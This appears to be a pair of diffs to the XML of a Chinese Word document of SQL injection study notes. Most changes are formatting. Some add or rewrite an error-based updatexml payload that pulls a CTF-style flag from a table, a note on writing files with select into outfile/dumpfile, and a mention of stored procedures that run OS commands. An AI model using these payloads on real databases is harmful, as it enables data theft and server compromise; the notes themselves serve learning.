       <w:startOverride w:val="1"/>
     </w:lvlOverride>

--- a/2.sql injection/sql注入笔记.docx
+++ b/2.sql injection/sql注入笔记.docx
@@ -17887,6 +17887,24 @@
                               <w:t>%23</w:t>
                             </w:r>
                           </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:hint="eastAsia"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>or updatexml(1,concat(0x7e,</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t>(select flag from flag</w:t>
+                            </w:r>
+                            <w:bookmarkStart w:id="46" w:name="_GoBack"/>
+                            <w:bookmarkEnd w:id="46"/>
+                            <w:r>
+                              <w:t>),0)%23</w:t>
+                            </w:r>
+                          </w:p>
                         </w:txbxContent>
                       </wps:txbx>
                       <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
@@ -17900,6 +17918,10 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
+              <v:shapetype id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
+                <v:stroke joinstyle="miter"/>
+                <v:path gradientshapeok="t" o:connecttype="rect"/>
+              </v:shapetype>
               <v:shape id="_x0000_s1028" type="#_x0000_t202" style="width:415.3pt;height:110.6pt;visibility:visible;mso-wrap-style:square;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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">
                 <v:textbox style="mso-fit-shape-to-text:t">
                   <w:txbxContent>
@@ -17915,6 +17937,24 @@
                       </w:r>
                       <w:r>
                         <w:t>%23</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:hint="eastAsia"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>or updatexml(1,concat(0x7e,</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:t>(select flag from flag</w:t>
+                      </w:r>
+                      <w:bookmarkStart w:id="47" w:name="_GoBack"/>
+                      <w:bookmarkEnd w:id="47"/>
+                      <w:r>
+                        <w:t>),0)%23</w:t>
                       </w:r>
                     </w:p>
                   </w:txbxContent>
@@ -22051,8 +22091,6 @@
       <w:r>
         <w:t xml:space="preserve">t </w:t>
       </w:r>
-      <w:bookmarkStart w:id="46" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="46"/>
       <w:r>
         <w:t>cmd];</w:t>
       </w:r>
@@ -22090,9 +22128,6 @@
       <w:pPr>
         <w:pStyle w:val="my"/>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -22116,9 +22151,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -22144,9 +22176,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -25081,10 +25110,10 @@
             <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
             <o:lock v:ext="edit" aspectratio="t"/>
           </v:shapetype>
-          <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:64.5pt;height:44.9pt" o:ole="">
+          <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:64.5pt;height:45pt" o:ole="">
             <v:imagedata r:id="rId54" o:title=""/>
           </v:shape>
-          <o:OLEObject Type="Embed" ProgID="Acrobat.Document.11" ShapeID="_x0000_i1025" DrawAspect="Icon" ObjectID="_1562518015" r:id="rId55"/>
+          <o:OLEObject Type="Embed" ProgID="Acrobat.Document.11" ShapeID="_x0000_i1025" DrawAspect="Icon" ObjectID="_1565380844" r:id="rId55"/>
         </w:object>
       </w:r>
       <w:r>
@@ -26391,13 +26420,7 @@
       </w:pPr>
       <w:r>
         <w:tab/>
-        <w:t>substring(</w:t>
-      </w:r>
-      <w:r>
-        <w:t>[string],[pos],[len]</w:t>
-      </w:r>
-      <w:r>
-        <w:t>)==</w:t>
+        <w:t>substring([string],[pos],[len])==</w:t>
       </w:r>
       <w:r>
         <w:t>substring([string] from [pos] for [len])</w:t>
@@ -26406,9 +26429,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:leftChars="300" w:left="630" w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:tab/>

--- a/2.sql injection/sql注入笔记.docx
+++ b/2.sql injection/sql注入笔记.docx
@@ -17888,21 +17888,8 @@
                             </w:r>
                           </w:p>
                           <w:p>
-                            <w:pPr>
-                              <w:rPr>
-                                <w:rFonts w:hint="eastAsia"/>
-                              </w:rPr>
-                            </w:pPr>
                             <w:r>
-                              <w:t>or updatexml(1,concat(0x7e,</w:t>
-                            </w:r>
-                            <w:r>
-                              <w:t>(select flag from flag</w:t>
-                            </w:r>
-                            <w:bookmarkStart w:id="46" w:name="_GoBack"/>
-                            <w:bookmarkEnd w:id="46"/>
-                            <w:r>
-                              <w:t>),0)%23</w:t>
+                              <w:t>or updatexml(1,concat(0x7e,(select flag from flag),0)%23</w:t>
                             </w:r>
                           </w:p>
                         </w:txbxContent>
@@ -22542,14 +22529,40 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>select into outfile(dumpfile)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
+        <w:t>select</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> “bytes”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> into outfile </w:t>
+      </w:r>
+      <w:r>
+        <w:t>“path/to/file”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，或者</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">select </w:t>
+      </w:r>
+      <w:r>
+        <w:t>“string” into dump file “path/to/file”</w:t>
+      </w:r>
+      <w:r>
         <w:t>。</w:t>
       </w:r>
+      <w:bookmarkStart w:id="46" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="46"/>
     </w:p>
     <w:p>
       <w:r>
@@ -22632,12 +22645,18 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>的扩展存储过程，可以通过调用该存储过程来执行操作系统命令。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
+        <w:t>的扩展存储过程，可以通</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
+        <w:t>过调用该存储过程来执行操作系统命令。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:tab/>
       </w:r>
       <w:r>
@@ -25113,7 +25132,7 @@
           <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:64.5pt;height:45pt" o:ole="">
             <v:imagedata r:id="rId54" o:title=""/>
           </v:shape>
-          <o:OLEObject Type="Embed" ProgID="Acrobat.Document.11" ShapeID="_x0000_i1025" DrawAspect="Icon" ObjectID="_1565380844" r:id="rId55"/>
+          <o:OLEObject Type="Embed" ProgID="Acrobat.Document.11" ShapeID="_x0000_i1025" DrawAspect="Icon" ObjectID="_1565768746" r:id="rId55"/>
         </w:object>
       </w:r>
       <w:r>
